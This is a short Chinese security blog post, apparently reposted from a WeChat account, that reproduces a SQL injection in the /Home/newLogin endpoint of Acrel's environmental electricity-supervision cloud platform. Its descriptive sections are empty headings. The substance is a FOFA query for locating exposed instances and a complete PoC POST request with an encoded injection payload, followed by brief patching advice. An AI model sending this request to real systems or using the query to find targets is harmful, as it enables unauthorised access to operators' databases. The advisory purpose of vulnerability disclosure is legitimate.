点击箭头处“蓝色字”,关注我们哦!!
产品简介
漏洞概述
复现环境
FOFA:body="myCss/phone.css"
漏洞复现
PoC
POST /Home/newLogin HTTP/1.1
Host:
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Priority: u=0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
Content-Length: 193
data=AmILgROn2omEYq%2Bd8Urox8DW%2F8rRQwsBzOEz00K3cyMY1DhHq6oDzKni9uNo6p7VIuEZBk0edl%2Blr8MukZeYaoj5ogyFWf1wJQ6iDSwIHOKSdk2%2BRRo%2FbhB70T5AlQ3PB6Ca1I6PvvVefK%2BuEF6b%2BqnvUH5y0gix7tq3yw1WJdc%3D
修复建议
关闭互联网暴露面或接口设置访问权限
升级至安全版本
文章来源:网络
原文始发于微信公众号(河北镌远网络科技有限公司):【漏洞复现】安科瑞环保用电监管云平台 HomenewLogin SQL注入漏洞复现
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论